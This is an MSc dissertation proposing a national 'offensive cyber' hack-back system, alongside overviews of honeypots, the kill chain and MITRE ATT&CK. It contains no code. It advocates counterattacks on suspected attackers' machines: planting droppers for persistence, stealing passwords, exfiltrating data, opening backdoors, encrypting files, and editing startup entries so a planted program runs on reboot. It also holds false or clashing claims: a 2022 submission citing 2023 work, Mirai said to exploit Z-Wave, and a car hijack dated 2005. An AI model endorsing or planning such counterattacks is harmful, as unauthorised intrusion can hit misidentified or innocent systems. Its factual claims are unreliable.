

Offensive Cyber Security to protect a Nation's Cyber Space

Submitted May 2022, in partial fulfillment of the conditions of the award of the Degree
MSc Cyber Security

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I hereby declare that the dissertation is all my work, except as indicated in the text.

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Acknowledgment:

I am grateful to the University of West London for allowing me to study for the MSc in Cyber Security. I was given a broad understanding of the latest cybersecurity tools and technologies during the course. I gained practical knowledge on the critical skills and techniques necessary to be a cyber security professional.

I would like to express my deepest gratitude to my supervisor, Dr. Syed Abbas Naqvi (Academic Dean UWL RAK UAE Campus), for his constant guidance and support. This study would not have been achievable without his continuous encouragement and invaluable suggestions.

Special thanks to my family, my old, aged parents for their continuous prayers 24/7.

My wife for convincing my kids Muhammad Zain and Noor to grant me one day out of their weekends to study and excel in life.

Cute little thanks to my newborn baby girl Shifa (born during MSc) for keeping me awake at night to complete & submit my assignments on time 😊

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Abstract:

Cyberattacks on businesses and financial institutions are becoming more frequent, especially during pandemics and other unrest situations around the world. Attacks have become very sophisticated. In recent years, reports of hacking activities against organizations in the public and private sectors have drawn a lot of attention. Cyber Threat Intelligence (CTI) has a solely defensive focus by design. This is due to the fact that most of the CTI-derived analysis output is created to aid in early detection or prevent breaches. Therefore, a new method of identifying the attacker is required. In this study, I will show how to totally control the attacker's system by enhancing cyber threat intelligence with counterintelligence and counterattack in addition to some novel techniques. Attackers create an anonymous connection using a VPN. By acting as a go-between for the attacker and the web, a VPN establishes a secure "tunneling" to the internet. Due to the IP address being masked, the attacker's IP address seems to be that of the VPN rather than his own, providing anonymity. Because it starts up automatically whenever a machine is restarted, hackers utilize this program to establish persistence. I suggest removing it from the startup and registry to end the persistence. This research will enable businesses to recognize an assault in its early stages and take appropriate action. To access reliable source information, this project will devise creative methods to get through VPNs and other security precautions. Companies will be able to quickly harden their systems by identifying new ways that they are breached. A suggested method can get around a VPN and obtain adversary intelligence by using counterattack and counterintelligence. Finding the attacker's footprints or traces and learning why the attack was planned in the first place are the key objectives of this research. The major application/implementation of this offensive cyber security approach will help governments to secure their cyber boundaries.

List of Abbreviations

Cyber Threat intelligence

Counterintelligence & Adversarial Intel

Counterattack & System information, Session, Privilege escalation.

TTP & Tactics, techniques, and procedures

Counterattack & Knowledge base of Adversarial machine access

Persistence & Root access using persistence process, threads etc.

C2/C3 Server & Get system privileges through Malicious code injection.

RDP & Remote desktop access

IP & Internet Protocol address

VPN & Secure connection between user and the internet

DNS & Domain Name System

Introduction:

Arsenal deterrence is maintained by countries around the world to make sure their sovereignty is intact. Hence, a country (if attacked) retaliates back. This readiness of nations around the world to retaliate in an event of an attack keeps the country at peace. In my opinion, the same should be applied to cyber security practices. Most of the articles and research papers on cyber security talk about the defensive side of it but some of the researchers think my way. In my opinion, this is a trap by the hackers and attackers to keep our knowledge limited to defense. It is always recommended to have antivirus and anti-malware installed to keep the virus away and keep the data backup up to date and on a secure offline site so that in case of any disaster i.e., ransomware attack we should be able to restore the data. All these measures are good enough to take but are defensive.

My idea is to go the extra mile to propose a concept of an Offensive-Cyber-Ozone-Layer (OCOL) system around a country's internet boundary where we deploy our expert offensive cyber security engineers to place the honeypots and honeynets to analyze the type of attempted attacks, trace the footsteps of the attackers in the dark web or wherever the attack is launched from, study the attack dynamics, do the counterintelligence and launch a counter-attack to defuse the weapons of the primary attackers. This will initially be a reactive approach. With the passage of time, the OCOL system will learn about the different types of cyber-attacks and their origins within the dark web or anywhere else. Based on the machine learning during this time an AI-based proactive version of the OCOL system can be developed which will then proactively look for the attackers in advance and defuse their weapons before they launch the attack into the OCOL-protected country. By successfully implementing the concept of the OCOL system a country can then announce to the world that its cyberspace is even more secure as compared to the rest of the world and can gain more business investments in it.

According to Swiss research, learning about the internet's dangers and how to protect yourself from them is a risk. When Swiss Re Co. looked at how many people were using technology, they found that cyber internet risks and electronic attacks were rising quickly. Merely responding to an event is no longer sufficient considering the expanding attack surface and the increasing complexity of threats. For attackers, the more complicated the environment, the more options there are for them (Doerr, 2020). Because every company or organization requires a different collection of apps, technology, and other elements to safeguard its own data, every industry and organization faces similar challenges. There are a lot of different things that can go wrong with each new type of attack, and people are always coming up with new ways to attack (Sanjeev Kumar "et al, 2020).

In the last few years, the lines between different kinds of threats and the people who make them have become less clear. Before, only a small number of businesses were at risk from methods and techniques that have now become widely available. The Shadow Brokers' code dump, for example, made sophisticated vulnerabilities available to criminal organizations that otherwise would not have had access to them (Zelin Wan "et al, 2021). It's also worth noting the rise of advanced persistent threat (APT) operations, which aren't so much about cyber espionage as they are about stealing money to fund their other activities. The list could go on and on.

It's becoming more evident that an effective defense against sophisticated and targeted assaults demands new ways of thinking. A proactive strategy for security is required for organizations to stay ahead of the ever-changing threat landscape. The only way to keep up with these developments is to create a robust threat intelligence program.

Threat intelligence, which can be read by both humans and computers, can help security teams by giving them useful information during the incident management cycle and by helping them make strategic decisions. As a result, there has been an explosion in the number of threat intelligence companies, each providing a variety of services. In an industry that is getting more and more competitive and broad, finding the right solution for your business may be very hard and unpleasant.

An untargeted threat intelligence solution might worsen the situation. False positives are consuming a substantial portion of security analysts' work in many organizations today, causing a considerable rise in detection times (Jaime C. Acosta "et al, IEEE Explore, 2020). If your security operations are given irrelevant or wrong information, the number of false alarms will go up, which will hurt both your ability to act quickly and the safety of your business.

Defensive capabilities dominate the CTI industry since much of the analytical output is designed to identify or prevent malicious intrusions. A comprehensive deception enrichment system is required to defend against intruders and to be provided with strong knowledge about them. You don't have to worry about the result of a hundred fights if you know your opponent and yourself, according to an ancient adage. You'll have a setback for every victory if you don't know yourself or your opponent. If you don't know your opponent or yourself, you'll lose every battle. " Somehow, in today's world, words like "data breach," "vulnerability," and "cyberattack" are commonplace. It is becoming increasingly difficult to keep up with difficulties as technology advances and an increasing number of gadgets are connected to the Internet. Known colloquially as canary tokens, honeytokens have been around for a while but are a good source of information. Unique IDs that can be used in a variety of locations are what they are. If they are contacted, an alert will be sent (Lee, 2023).

The six basic components of cyber threat intelligence are a closed loop. All these aspects are interconnected and reliant on the preceding phase in the process to function. The Cyber Threat Intelligence Lifecycle is shown in figure 1 and it has several stages. The first stage is to figure out what information you need to make educated judgments in the shortest amount of time feasible. Determining the nature of the attack and the compromised devices and information helps to create goals based on evidence. Secondly, depending on the circumstances, data collection may include both digital and physical evidence. If the assault is sophisticated enough, this data may include audit records, IP addresses, CCTV images, or even physical equipment. For large-scale data collection, effective planning, storage, and processing must be taken into consideration.

Thirdly, raw data is subsequently transformed into more easily readable formats via a process known as "processing." Decoding information, grouping data, or categorizing information that matches a given context or source may all be part of this process. In the fourth step, a chronology must be built from the material gathered, and it is necessary to compare conflicting accounts to better comprehend the course of events. There may be trends and other facts that need more investigation at this point. A human analyst and other tools are nearly always involved in this step of the cycle, which is frequently one of the most time-consuming. Furthermore, the results of the analysis stage must be disseminated to the right people so that they may act. Lastly, because of the feedback received in the preceding processes, a decision is made to go forward. Retaliation, the deployment of additional security features, or the addition of more data to the cycle for recanalization are all possibilities. After receiving input, the procedure begins again.

Getting started in a network involves phishing, misusing public-facing services, and exploiting vulnerabilities. An attacker may interact with a system in different ways. An attacker may circumvent detection by security appliances by exploiting high-numbered or uncommon ports. Enemies use a range of methods to gather and synthesize data. If the user's credentials are updated or the computer is

restarted, the attacker may still have access. So, a hacker may set up a scheduled task to run their code at a certain time or upon system reboot. Attackers use defensive evasion techniques to avoid detection. Security protections may be circumvented by obfuscating malicious code or hiding it inside normal files and processes. Execution is the process of executing code on a target system. An attacker may, for example, use PowerShell to download more tools or check other systems for vulnerabilities. Attackers use several methods to obtain information about networks and systems.

Credential access is the practice of stealing and reusing usernames and passwords on networks and systems. Impact is an attacker's ability to alter data, systems, and networks. This includes denial of service and data or disc wiper attacks. Latitudinal mobility is an attacker's ability to move between systems inside a network. Accessing a user's computer using pass-the-hash authentication or remote desktop protocol abuse is common. This includes strategies for moving data from a compromised network to one controlled by the attacker. Privileged escalation is the process of becoming root or a local admin on a computer.

In this research work, we enrich the cyber threat intelligence mechanism by providing counterintelligence and counterattack techniques. Generally, the intelligence part captures the adversary's intel, for example, system information, running processes, router information, etc. The Counterintelligence and Counterattack Framework will offer an efficient and cost-effective method for identifying and analyzing an attack. The main goal of the research is to identify an attacker's tracks and identify the actual location of the intended attack. Furthermore, the design of experiments for quantitative research is the main emphasis of this study. This study is being done to test the theory in a controlled environment.

We need to find alternative creative approaches based on not only stopping the attacks but also tracking any attacker and even hacking the system from his information because counter-threat intelligence is used so infrequently and cyberattacks have become so severe. What if, as was the case with the earlier techniques, the attacker is utilizing a VPN? This study closes the knowledge gaps. The basic data about the attacker is then shown, including an incorrect IP address. Therefore, we conduct tests to offer a range of alternatives.

Motivation:

In this research work, we enrich the cyber threat intelligence mechanism by providing counterintelligence and counterattack techniques. Generally, the intelligence part captures the adversary's intel, for example, system information, running processes, router information, etc. On the other hand, the counterattack part will perform multiple actions like placing a dropper on the attacker's machine for the purpose of creating persistence as well as stealing passwords, data exfiltration, backdoor sessions, and encrypting files.

Problem Statement:

Companies are getting attacked more and more by sophisticated and targeted attacks, so it's clear that they need new ways to defend themselves. To stay safe, industries need to be proactive and keep changing their security controls to keep up with the constantly changing threat environment. Building an effective threat intelligence system is the only way to keep up with these changes.

A comprehensive defensive system is required to defend against an intruder and to be provided with strong knowledge about him. To the best of our knowledge, there exists no counterintelligence mechanism for unmasking the real attacker in cyber deception.

Research Contribution:

Build an evolutionary game for cyber-attack-defense based on deception enrichment counterintelligence. The framework of deception as defense has been presented by us for Cyber Threat Intelligence Enrichment with Counterintelligence and Counterattack mechanisms for cyber physical systems. Demonstrate the enrichment of cyber threat intelligence with counterintelligence and counterattack in combination with novel techniques to exploit the weaknesses of the adversary and to completely control the attacker's machine.

To defeat the VPN and get actual intel of the adversary, we proposed a multi-stage algorithm in which we get all the startup, then remove 3rd party services from the registry and place our exe program in the startup folder. Lastly, the machine rebooted. After the operating machine restarts, our malicious program is executed on the attacker's PC and the system pings the public IP.

Thesis Structure:

A comparative literature review of literature on counterattack, cyber deception, and threat intelligence. The cyber kill chain is presented in chapter 3 and chapter 4 explains the suggested technique in depth. Chapter 5 focuses on the construction of counterattack malicious documents. Chapter 6 provides a case study that can be used for counterattack. It ends the thesis with suggestions for future research and a summary.

Preliminary Studies

Background studies are divided into sections based on the study subject. The first section illustrates Deception & Cyber Kill Chain, then MITRE ATT&CK Framework and Cyber Deception Chain. In addition, the Cyber Threat Intelligence and Threat Hunting section presents the basic facts.

Deception:

Honeypots are devices that attract attackers by mimicking another system worth attacking. Honeynets take this a step further by simulating several computers or a network, whilst tools like the deception toolkit give the appearance that a computer system's defenses are stronger than they are by building phony weaknesses. Cyber deception is a strategy for improving cyber security while deceiving attackers. Most organizations are deceitful, using decoys, traps, and honeypots to fool foes and learn their intents and activities. Organizations frequently employ cyber deception to identify unusual intruder behavior on their networks and end-point devices. Many businesses conduct offensive security exercises to test the system's security. A deception setup frequently provides a self-contained static and dynamic analysis of any firm's risk surface. Organizations utilize a variety of methods to do this, one of which is to draw adversaries' attention and push them to thoroughly oppose their imaginary false system. Companies do this to recognize and guard against complicated market threats that emerge on a regular basis. A honeynet is a network of honeypots that is frequently used interchangeably with the term "deception." As a result, in our setup, we utilize many honeypots for various services that are disguised as legal by erecting an effective security barrier. We do this to give the impression that attackers have found system vulnerabilities and are poised to launch full-fledged attacks. We analyze attack scenarios using log data and are continually working to enhance the organization's security protection by delivering real-time advice.

Further, create an evolutionary game based on deception enrichment counterintelligence for cyber-attack defense. We provided a concept of deception as defense for Cyber Threat Intelligence Enriched with

Counterintelligence and Counterattack Mechanisms for Cyber Physical Systems. Demonstrate the enrichment of cyber threat intelligence with counterintelligence and counterattack strategies in conjunction with unique approaches to exploit the adversary's weaknesses and totally control the attacker's computer.

Cyber Kill Chain:

The cyber kill cycle is a Lockheed Martin cybersecurity model that monitors the stages of a cyber-attack, identifies vulnerabilities, and assists security teams in preventing assaults at each step along the chain. Originally, the word "death chain" was used to describe the organization of a combat attack. Assaulting

an adversary necessitates hunting down and eliminating an adversary prior to issuing an order to eliminate the adversary [13]. Figure 2 depicts a cyber death chain concept.

Reconnaissance refers to strategies used by adversaries to obtain information that may be used to help in targeting, either actively or passively, because of their actions. This sort of information includes, for example, information about the victim's organization, infrastructure, and workers [14]. Following the breach, the adversary may use this information to assist in the planning and execution of Initial Access, to define and prioritize post-compromise goals, or to lead and drive future Reconnaissance actions [15]. Malware is created by taking advantage of security flaws. Malware is produced by attackers based on their requirements and the goal of the attack. Attackers also aim to limit their chances of being discovered by the organization's security measures throughout this phase [16]. The weaponized malware is distributed by the attacker via phishing email or another manner. Websites, portable DVDs, and emails are among of the most frequent delivery vectors for armed payloads. This is the most vital moment, when

security professionals can act and prevent the assault from happening [17]. It gets transmitted into the organization's system, where the malicious malware is run. At this point, the perimeter has been breached. Attackers can also compromise an organization's systems by installing tools, running scripts, and changing security certificates [18]. The virus installs a backdoor or remote access trojan that grants access to the intruder. This is also an important stage in which methods can be deployed to block the onslaught [39]. The attacker obtains access to the network and information technology (IT) systems and networks of the firm. After gaining access to privileged accounts, attackers can take control of the accounts through brute force attacks, password searches, and permission modifications. Finally, the attacker extracts the data from the system. The purpose is to gather, encode, and extract personal data from the organizational field.

MITRE ATT&CK Framework:

MITRE ATT&CK is a knowledge base and strategy that provides a thorough understanding of the tactics, methods, and procedures (TTPs) utilized by threat actors at various phases of a cyber assault. It is a well-known technology that assists firms in analyzing and improving their cyber security. MITRE ATT&CK is a matrix that categorizes threat actors' TTPs into 12 tactics and provides a common vocabulary for characterizing and sharing cyber threat data. MITRE ATT&CK may help organizations find flaws in their defenses and develop more effective tactics for detecting, avoiding, and responding to cyber-attacks. The MITRE ATT&CK database provides a comprehensive list of assets, attack phases, and defenses essential

Figure 3: MITRE ATT&CK Framework

for threat modelling. The MITRE ATT&CK Enterprise Framework techniques are divided into many categories, each reflecting a different stage of an assault. The official website of the MITRE ATT&CK framework has a plethora of methods that may be used in conjunction with one another. The MITRE ATT&CK Enterprise Framework Tactics are depicted in figure 3.

Reconnaissance:

Reconnaissance refers to the procedures used by opponents to obtain information that may be utilized to aid in targeting, either actively or passively. It is possible to submit information on the afflicted organization's infrastructure, staff/personnel, or financial status. This information might be used by the adversary to help with numerous aspects of the adversary life cycle, such as planning and executing Initial Access, identifying, and prioritizing post-compromise objectives, or driving and directing subsequent reconnaissance activities. The official website of MITRE ATT&CK provides ten (10) alternative tactics that can be used in tandem.

Initial Access:

"Initial Access" refers to techniques that employ several access vectors to get a foothold in a network. To get a foothold in the market, spear phishing and exploiting web server vulnerabilities are utilized. During the first access phase, permanent or transitory footholds, such as valid accounts and the use of external remote services, may be established. The official website of the MITRE ATT&CK framework contains a list of nine (09) distinct methods to use the framework. They can all be used in tandem.

Execution:

After gaining initial access, hackers execute their malware on a target machine during the execution step of the MITRE ATT&CK framework. During this stage, attackers use malware such as backdoors, remote access trojans, or ransomware to retain their footing on the system and carry out their harmful goals. Malware can be executed in a variety of methods, including using programming languages, exploiting software vulnerabilities, and exploiting holes in system settings. For attackers, the execution step is essential because it allows them to create persistence and avoid discovery by employing different methods like obfuscation, encryption, and anti-debugging. Furthermore, the term "execution" refers to methods for remote execution code on a local or remote system while an adversary retains control. Harmful code execution techniques are frequently used for a variety of harmful purposes, including network exploitation and data theft. An attacker, for example, may make a remote system discovery using a remote access tool.

Persistence

Persistence refers to adversary strategies for retaining system access in the face of restarts, updated credentials, and other disruptions that might lead to a denial-of-service assault. Persistence tactics are any activities, access, or modifications that allow them to maintain control of systems, such as changing or hijacking lawful programs or adding start code.

Privilege Escalation

In the MITRE ATT&CK methodology, Privilege Escalation is a step in which attackers attempt to increase their level of privilege to a targeted system. During this stage, attackers want to get more privileges than they originally had to gain access to more critical information and resources. Attackers can increase their privileges by exploiting software flaws, leveraging weak authentication systems, or utilizing stolen credentials. Once attackers' privileges have been elevated, they can launch more sophisticated assaults such as data exfiltration, network reconnaissance, or lateral movement.

Defense Evasion

The term "defense evasion" refers to the methods used by attackers to evade discovery during a breach. Defense evasion strategies include uninstalling or deactivating security software, as well as obfuscating or encrypting data and programs. In addition, attackers use trusted processes to conceal and mask their infection. When the methods of other techniques have the added benefit of weakening defenses, they are cross listed here.

Credential Access

In the MITRE ATT&CK framework, credential Access is a step in which attackers attempt to get valid account credentials to gain access to a target system or network. During this step, attackers utilize numerous tactics to collect valid credentials, such as password spraying, phishing, or keylogging. After obtaining legitimate credentials, attackers might exploit them to carry out a variety of nefarious operations such as lateral movement, data exfiltration, and privilege escalation. Credential dumping methods may also be used by attackers to get credentials saved on a compromised machine or network.

Discovery

During this phase, attackers employ a variety of techniques to identify and map out the target system's or network's resources, such as devices, apps, and user accounts. Attackers may use several methods to find targets, including network scanning, port scanning, and reconnaissance. They may also use Nmap and Ping to discover open ports, services, and devices on a target network. Furthermore, attackers may obtain information about the target organization through public information sources such as social media and job postings.

Lateral Movement

An intruder advances from one endpoint to the next at this stage of the assault. Depending on the concept or framework (cyber death chain, MITRE ATT&CK, or unified kill-chain), it is at various stages of development. Assume the attack goes unnoticed. If the attacker uses off-the-grid approaches, he or she might theoretically remain on any endpoint and join the network through backdoors at any moment. Cleaning all endpoints is extremely time-consuming, if not impossible. Deception technology assists the security team in several ways, including alerting analysts to lateral movement, giving context-specific and specialized threat data, and detecting lateral movement early. Attackers may also mask their operations as legitimate system actions or use real tools and software for malicious objectives to maintain persistence and avoid detection. After gaining access to more systems or resources, attackers might launch more sophisticated attacks like data exfiltration, privilege escalation, or ransomware campaigns.

Collection

Information obtained from a compromised machine. During this stage, attackers gather data from the target system using different techniques like exfiltrating sensitive data, stealing passwords, or collecting keystrokes. Attackers may collect data in a variety of ways, including keyloggers, screen capture tools, and network sniffers. They may also harvest data from the target system using built-in system tools such as PowerShell or Windows Management Instrumentation (WMI). Once the data has been captured, the attackers may compress or encrypt it before transferring it to a remote server under their control. Furthermore, "Collection" refers to both the processes used to obtain information and the sources from which that information is acquired for an opponent. After data has been gathered, attempts to steal (exfiltrate) it are widespread. Hackers regularly target data storage devices, internet browsers, video or

audio players, and email clients. Screenshots and keyboard input are two of the most used data collection techniques.

Command and Control

In the MITRE ATT&CK concept, command, and control (C2) is a step in which intruders established a way to communicate with the compromised computer to issue commands and get instructions. During this stage, attackers utilize a variety of tactics to establish a persistent connection between the compromised machine and a remote server under their control.

Attackers can utilize DNS tunnelling, HTTP or HTTPS protocols, or disguising their communications within legal traffic to construct C2 channels. After establishing the C2 channel, attackers can deliver orders to the compromised machine or network, such as downloading and running malware, exfiltrating data, or performing reconnaissance. Furthermore, to escape detection, attackers usually attempt to mimic what they think to be typical discussions. An attacker can gain command and control in a variety of methods, depending on the target's network architecture and security procedures.

Exfiltration

Exfiltration refers to the methods used by attackers to take data from your network. When adversaries get data, they frequently bundle it to avoid detection while erasing it. Two such examples are compression and encryption. It is usual for data extraction techniques to send data across the network's command and control channels or an auxiliary channel while limiting the amount delivered.

Cyber Deception Chain:

The deception chain, like the cyber kill chain, is naturally recursive and divided. Throughout the phases of preparation, execution, and assessment, deception operations require ongoing re-examination of their aims, targets, narrative, and tactics. Planners of deception must be able to adjust to both hostile and friendly conditions. A cover story or stories—the deception version of the target's perceptions and beliefs—must be created by the deception planner. Consider the important components of the operation, as well as the opponent's observation and analytic talents, then invent an engaging story that "explains" the operation's components while fooling opponents about their meaning and importance. This is an important step. The most effective cover stories are based on what an opponent already thinks and wants to believe. To create a convincing fake, the deception planner must examine the complexities of the genuine deed. Determine the matching signatures that the opponent will notice, then accurately mask, repackage, dazzle, and those signs to conceal them from the adversary. The deception planner must examine both the anticipated impact of the operation and the means and resources that are currently available to accomplish that impact on the opponent as part of the deception strategy. The cyber chain model is shown in figure 3.

To maintain the misleading cover story, the planner must coordinate all scheduled and unplanned equipment, personnel, and training with other operators throughout this period. If the deception and genuine operational preparations can be synchronized and maintained, the deception planner and other operators must coordinate and manage all essential preparations so that the deception cover story may

be delivered consistently, reliably, and successfully. At this moment, deception planning concludes, and deception operations control begins. The deception controllers oversee supervising and monitoring the deception operations as well as the actual operational preparations that go along with them.

Deception controllers, in other words, keep an eye on both friendly and adversary operational preparations, as well as the observation channels and sources used to communicate simulation signatures to the opponent. If the deception controller's simulations and monitoring of the opponent are designed in such a way that if the adversary notices the cover story, the adversary's actions or responses must unmistakably indicate that the cover story has been accepted.

Literature Review:

This section presents the literature review of five different research papers. The first one is co-authored by Dr. Faisal Al-Fouzan KSA, Dr. Huy Kang Kim, and Dr. KyoungGon Kim (Kim "et al., 2021). This research paper is considered the first scientific research done on this subject. As explained, not only the techniques used in cyber-attacks have matured but the purposes of the attacks have changed also. The latest type of cyber-attacks can disrupt the critical infrastructure of a nation. Hackers/attackers are humans and systems, and victims are also humans and systems. If hackers can develop the latest cyber weapons and attack to gain their benefits, why can't we be offensive to protect our legitimate assets?

This research paper (Kim "et al., 2021) is research done to understand the type and nature of attacks and attackers. Different types of attacks as well as individuals and state-sponsored hacking groups are studied and discussed. In 2005, two researchers identified and revealed critical vulnerabilities in an autonomous car (Kim "et al., 2021). They tried and remotely controlled the car and stopped it in the middle of the road.

Cyber-attacks on the internet of things (IoT) and other smart home devices are also very common. The famous Mirai Botnet attack paralyzed the Dyn server in the US resulting in preventing the services of some big tech companies such as PayPal and Twitter. Mirai exploited a critical vulnerability in the Z-Wave (*the wireless communication protocol*) widely used in IoT devices such as IP cameras, door locks, etc., and turned them into Mirai-like zombie army of botnets which generated massive traffic from these devices and sent to the Dyn server which consumed the server resources completely and resulted in a DDOS attack. Although this research paper paves the way to identify the number and nature of cyber-threats which is the initial stage of an offensive cyber security approach (*because if one doesn't know the type of cyber-attacks how he/she would be able to develop the strategy and weapons to counterattack*) it doesn't clearly state about the strategy and the weapons to be used in offensive cyber-security. This paper also doesn't talk about how to identify the geo-location of the hacker which is very important to do counterintelligence to launch a counterattack.

Another research paper (Usman "et al, 2022) takes my research to the next level. It talks about the practical approach to the subject. Hackers use VPNs to hide their identity when they attack. Hence, deception-enrichment-counterintelligence with some sophisticated tools is required to gather information about the adversary and to take control of their machines from where they launch the attacks. A honeypot named HoneyBadger is designed in such a way that it provides hackers with administrative access. When an attacker gains access to a system and tries to access sensitive data, honey tokens get combined with these data files to identify a security breach. The Honey token is then used to conduct a counterattack on the attacker while circumventing different defenses such as VPN, this is how the attacker's identity is revealed. To defeat the adversary VPN and get their actual information a multi-stage algorithm works. Document-based tokens are also used to identify the attacker. MS word and excel documents can easily bypass the security gateway of the attacker. This research paper has added knowledge to my research, but it depends on the pre-made tools for offensive security whereas I believe that we need our own custom-made tools which help us in achieving our goals 100%.

(A. B Ajmal "et al, 2021) discusses offensive cyber-security by proactive hunting via adversary emulation. It is a good effort to do an offensive security exercise on an organizational level. The process defined is almost accurate as it is supported by mathematical formulae and equations. An experiment has been performed to do adversary emulation. The experiment is divided into two phases, the first phase starts with launching an offensive exercise to compromise a target and the second phase involves a counter exercise that aims to capture expected threats emerging from the offensive exercise. Although this experiment is lab-based it aims to closely mimic real-world scenarios. This is good work done but is limited to the lab or the organization level only. Offensive cyber-security activities done within the organization won't benefit a nation-state as its scope is limited.

Cybercrimes have gone to the next level that the criminals have stolen even legitimate terminologies such as IaaS, SaaS and they are selling their criminal services such as RaaS (Ransome as a Service) says (Bátrla "et al, 2022) in their conference paper. Offensive cyber operations have not only disrupted the ransomware eco-system, but criminals have been physically caught too. One of the major examples is Operation Ladybird which helped disrupt the long-lasting malware Emotet botnet as well as put criminals behind bars. It was a combined operation by different nation-states including the USA, Ukraine, Germany, and the Netherlands. The criminals attacked many organizations including hospitals where the patients suffered due to the lack of services the affected hospital had to move the patients to other hospitals and had to revert to the old-age paper documentation which resulted in delaying the health services to people.

The operations discussed in this paper motivate me more to contribute to the offensive cyber operation to provide safety to the human eco-system.

The 5th research paper talks about the ethics of offensive cyber security. The authors (Nedaa B "et al, 2014) followed a survey approach that focused mainly on the Arab population to get the answers to the questions of the survey. In this research, the researchers tried to identify why cyberattacks happen on civilians when a country's cyber force attacks another country for political gains or any other reason. An interesting thing about the findings of the survey in this research paper is that even the public is of the opinion to practice offensive cyber-operations for self-defense. Although in this research paper the authors tried to find some statistics about the impact of offensive cyber operations on civilians but didn't provide a practical solution to the problem. I think this is the time when an OCOL kind of cyber-offensive defense system can protect the attacks on organizations as well as civilians by counter-attacking the attackers by identifying their real geolocations and the type of cyber weapons they use.

Aside from reconnaissance, the author provides a way for dealing with APT attacks. They show how defensive deception (DD) helps both attackers and defenders minimize perceived uncertainty. This is because the hacker feels he has deeper knowledge of the system by posing as an insider. While the intruder is still in the system, the defense gap can be reduced by employing defensive deception to obtain more threat intelligence (Zelin Wan "et al, 2021).

The author describes the Cybersecurity Deception Experimentation System (CDES) in this study. On top of the Common-Open-Research-Emulator (CORE), they provide a platform for testing dynamic deception techniques. Three case studies demonstrate how CDES may be utilized to build dynamic honeypots in more complex circumstances, and the nuances of each implementation are also covered in such articles (Jaime C. Acosta "et al, IEEE Explore, 2020)

The author discussed an interactive method involving attackers and targeted online assaults as an answer to the issue of targeted web attacks. Something other than security controls and Honey projects is required as a replacement. Using honeytokens and honey files, they developed a web application firewall based WDS framework that could identify malicious traffic while also fooling the attacker. As a result of the framework, malicious traffic is sent to load balancers, which in turn send it to web deception servers. Web deception servers will receive maliciously directed traffic and send it to the production site. Otherwise, it will be routed to the deception servers (Azer, 2018).

For network administrators facing both experienced and rookie attackers, the authors have developed a greedy method that discovers effective defense tactics fast and performs empirically. For advanced cyber attackers, they created a comprehensibility manipulation approach to generate fake docs for cyber-deception systems. Ejecting an intruder may lead to more sophisticated attacks, so the best way is to engage them. Authors have used traditional game theory to understand cyber deception scenarios and defend the system (Prakruthi Karuna "et al, 2020).

By using deep learning, authors have proposed a differentially private synthetic data generation model to generate synthetic data which could enhance the capability of honey pots to deceive intruders. They have introduced a game theoretic approach to manipulate adversaries' beliefs through cyber deception and provide information on the exercise management and assistance program CRATE Exercise Control (CEC) and shown that cyber deception is needed to respond to sophisticated attacks.

Game-theoretic hierarchical equilibrium is used in the development of defensive methods, which have high values and applicability in many CPS settings and allow them to perform behaviors that are unintentionally aligned with the system's interests when used with crafted bait. They utilized sophisticated deception strategies and tactics in this study. The author discusses cyber defense strategies

with modelling through game theory and examines high-level deception strategies and actions from a formal perspective on cyber deception (Al-Shaer, 2020).

A computer model of cognitive deception because of the theory of Instance-Based-Learning-Theory (IBLT) may account for attack decisions when deception is present in varying quantities and at varying times. Fake sources are scheduled to preserve system performance while also protecting the anonymity of their location. Cyber-physical systems may be protected against a random-walking intruder with the help of FSSE. There are two major stages to the algorithm. First, a backbone design that takes capturing the source into account is given. The attacker's predicted location is verified using stochastic methods to create fake message scheduling. According to the simulation findings, FSSE successfully protects against hackers while also offering a greater degree of privacy and better system efficiency (Ravi "et al, 2022).

Their approach is an innovative mix of defensive and offensive security exercises that uses threat hunting to collect, identify, and analyze assault patterns by anticipated dangers. Phishing attack vectors are created by merging real-world attack circumstances with an algorithm. The suggested method has improved the efficiency with which attacks may be identified and countered as opposed to more conventional approaches like VAPT, which concentrate on well-documented security risks. The suggested plan is aimed at detecting and countering new and unidentified threats (A. B Ajmal "et al, 2021).

Comparison Table:

Name	Strategy	Model	Proposed Solution	Limitation
(Abdul Khadar A "et al, 2023)Comprehensive Event-Time-Action Threat Intelligence to Prevent Advanced Persistent Threats	Threat Intelligence-based approach	CETA model	Proposed a threat intelligence-based approach that uses a comprehensive event-time-action (ETA) model to prevent Advanced Persistent Threats (APTs) by continuously monitoring network activities, identifying potential threats, and taking appropriate action	The proposed approach requires a large amount of historical data to effectively train the ETA model, which may not be readily available in all organizations. Additionally, the approach relies heavily on accurate and timely threat intelligence, which can be challenging to obtain.
(Kumar, 2023) Advanced Persistent Threat Detection and Mitigation Using Machine Learning Model	Machine learning-based approach	Random Forest (RF) and Support Vector Machine (SVM) models	Proposed an approach that uses Random Forest (RF) and Support Vector Machine (SVM) models to detect and mitigate Advanced Persistent Threats (APTs) by analyzing network traffic	The proposed approach was evaluated using a limited dataset, which may not be representative of real-world scenarios. Additionally, the approach relies on accurate labeling of the data used for

				training the models, which can be a challenging task.
(Md Abu Sayed "et al, 2023) Cyber Deception Against Zero-Day Attacks: A Game Theoretic Approach	Theoretical study	Game-theoretic model	Proposed a game-theoretic model for cyber deception against zero-day attacks that enables the defender to choose the optimal deception strategy while considering the attacker's optimal attack strategy	The study did not test the proposed model in a real-world environment, which may limit its practical applicability. Additionally, the model assumes that the attacker's behavior is rational, which may not always be the case.
(Chakkaravarthy, 2023) Containerized Cloud-based Honeypot Deception for Tracking Attackers	Honeypot-based approach	Honeypot deception model	Track attackers using honeypots	Requires significant resources to set up and maintain, may be vulnerable to advanced attackers who can detect and avoid honeypots
(Hiroki "et al, 2023) Canary in Twitter Mine: Collecting Phishing Reports from Experts and Non-experts	Data Collection	N/A	Collecting Phishing Reports via Twitter	Relying on voluntary contributions from Twitter users
(Segundo, 2023) On Deceiving Malware Classification with Section Injection	Deception	Machine Learning	Injecting random data into benign files to create new samples that are misclassified as malware by machine learning models	Injected sections may not always be completely undetectable, and may be more effective against certain machine learning models than others

(Waqas "et al, 2023) Detection and Analysis of Active Attacks using Honeypot	Honeypot-based approach	Game theoretical model	Monitoring, recording, and analyzing attacker activities using honeypot technology	May not detect advanced persistent threats (APTs) or zero-day attacks, attackers may identify and evade honeypots if they are not properly configured and maintained.
(Tahir Khan "et al, 2023) Analysis of SSH Honeypot Effectiveness	Deception	SSH Honeypots	Analyzing SSH logs	Attackers can easily identify honeypots and adapt their attacks accordingly
